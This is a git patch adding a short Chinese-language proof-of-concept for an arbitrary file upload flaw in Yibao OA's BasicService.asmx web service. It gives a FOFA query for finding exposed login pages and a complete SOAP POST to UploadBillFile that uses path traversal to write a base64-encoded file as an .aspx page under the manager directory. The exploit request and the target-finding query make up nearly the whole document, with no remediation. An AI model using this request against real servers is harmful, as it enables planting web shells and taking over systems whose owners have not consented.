From b5b83779a55f1793b17f40f32f03b0b1961ceb50 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:35:08 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=98=93=E5=AE=9DOA-BasicService.asmx?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A?= =?UTF-8?q?=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...OA-BasicService.asmx存在任意文件上传漏洞.md | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 易宝OA-BasicService.asmx存在任意文件上传漏洞.md diff --git a/易宝OA-BasicService.asmx存在任意文件上传漏洞.md b/易宝OA-BasicService.asmx存在任意文件上传漏洞.md new file mode 100644 index 0000000..759e1e6 --- /dev/null +++ b/易宝OA-BasicService.asmx存在任意文件上传漏洞.md @@ -0,0 +1,36 @@ +## 易宝OA-BasicService.asmx存在任意文件上传漏洞 + + +## fofa +``` +title="欢迎登录易宝OA系统" +``` + +## poc +``` +POST /WebService/BasicService.asmx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +SOAPAction: http://tempuri.org/UploadBillFile +Content-Type: text/xml;charset=UTF-8 +Content-Length: 521 + + + + + + + aGVsbG8K + + ../../manager/hello.aspx + + {ac80457b-368d-4062-b2dd-ae4d490e1c4b} + + + +```